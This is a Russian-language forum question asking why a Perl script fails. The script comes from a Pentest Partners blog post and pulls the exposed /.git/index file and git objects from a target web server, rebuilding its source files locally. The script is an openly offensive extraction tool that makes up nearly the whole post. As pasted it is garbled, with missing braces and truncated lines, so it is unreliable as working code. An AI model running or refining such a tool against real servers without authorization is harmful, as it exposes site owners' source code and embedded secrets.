Поэтому я пытаюсь следить за публикацией партнеров Pentest (https://www.pentestpartners.com/security-blog/git-extraction-abusing-version-control-systems/), чтобы извлечь метаданные из открытого порта git.
Я получаю сообщение об ошибке при запуске предоставленного сценария perl.
Полная трассировка стека:
Bareword found where operator expected at ./git-grab.pl line 102, near "print "Extracting"
(Might be a runaway multi-line "" string starting on line 97)
(Do you need to predeclare print?)
Global symbol "%i" requires explicit package name at ./git-grab.pl line 37.
Global symbol "$resthash" requires explicit package name at ./git-grab.pl line 94.
Global symbol "$entry" requires explicit package name at ./git-grab.pl line 94.
Global symbol "$file" requires explicit package name at ./git-grab.pl line 94.
Global symbol "$firsttwo" requires explicit package name at ./git-grab.pl line 97.
Global symbol "$resthash" requires explicit package name at ./git-grab.pl line 97.
Global symbol "$rawdata" requires explicit package name at ./git-grab.pl line 97.
Global symbol "$decompressed" requires explicit package name at ./git-grab.pl line 97.
Global symbol "$oh" requires explicit package name at ./git-grab.pl line 97.
syntax error at ./git-grab.pl line 102, near "print "Extracting"
./git-grab.pl has too many errors.
Вот сценарий:
use strict;
use File::Path qw(make_path);
use LWP::UserAgent;
use File::Temp qw(tempfile tempdir);
use Compress::Zlib qw(uncompress);
sub readtime
my ($handle, $hashref) = @_;
read $handle, my $rawtime, 8;
( $hashref->{'lsb32'},
$hashref->{'nsec'} ) = unpack "NN", $rawtime;
return $hashref;
sub readindex
my ($infile) = @_;
my $packindex;
# read the header
read $infile, my $rawheader, 12;
my $header = {};
($header->{'ident'}, $header->{'version'}, $header->{'entries'})
= unpack("a4NN", $rawheader);
die "Not a git index file" if ($header->{'ident'} ne "DIRC");
die "Unsupported version of git index" if ($header->{'version'} != 2);
my @index_entries = ();
for (my $i=0; $i{'entries'}; $i++)
my $statinfo = {};
my $entry = {};
my $rawdata;
my %ctime = ();
my %mtime = ();
$statinfo->{'ctime'}=readtime($infile, \%ctime);
$statinfo->{'mtime'}=readtime($infile, \%ctime);
# read the non-time fields
read $infile, $rawdata, 24;
( $statinfo->{'dev'}.
$statinfo->{'size'} ) = unpack "NNNNNN", $rawdata;
read $infile, $rawdata, 20;
( $entry->{'id'} ) = unpack "H*", $rawdata;
read $infile, $rawdata, 2;
( $entry->{'flags'} ) = unpack "n", $rawdata;
# Finally read name - it's length is the lower 11 bits of flags
my $namelength=($entry->{'flags'} & 0x7ff)+1;
# Pad it up to a multiple of 4
read $infile, $rawdata, $namelength + (8 - (($namelength + 62) % 8)) %8;
($entry->{'name'}) = unpack "a" . ($namelength-1), $rawdata;
push(@index_entries, $entry);
return @index_entries;
# First grab the database file
my $target=$ARGV[0];
my $giturl="http://$ARGV[0]/.git/index";
my $ua=LWP::UserAgent->new;
print "Target is: $giturl\n";
$ua->agent("All Your Files Are Belong To Us/1.0");
my $request=HTTP::Request->new(GET => $giturl);
my $result=$ua->request($request);
if ($result->status_line !~ /^200/)
die "Could not find Git index file";
my ($dbfileh, $dbfilen) = tempfile();
print $dbfileh $result->content;
close $dbfileh;
open(my $infile, "{'id'},0,2);
my $resthash=substr($entry->{'id'},2);
my $file=".git/objects/" . $firsttwo . "/" . $resthash;
my $rawdata;
my $decompressed;
my $oh;
print "Extracting" . $entry->{'name'} . "\n";
my $giturl="http://$server/$file";
my $frequest=HTTP::Request->new(GET => $giturl);
my $fresult=$ua->request($frequest);
# Make sure the path is there for the output
my $outputpath="output/" . $entry->{'name'};
$outputpath =~ s#/[^/]*$##g;
open $oh, ">", "output/$entry->{'name'}";
# Now decompress the data
my $gitfile={};
($gitfile->{'type'}) = substr($decompressed,0,5);
if ($gitfile->{'type'} ne "blob ")
print "Unknown git file type: $gitfile->{'type'}. Skipping\n";
($gitfile->{'size'}) = unpack "Z*", substr($decompressed,5);
($gitfile->{'data'}) = substr($decompressed,length($gitfile->{'size'})+6);
# And write it
print $oh $gitfile->{'data'};
Я не уверен, что с ним не так. Если кто-то может помочь, это будет действительно полезно?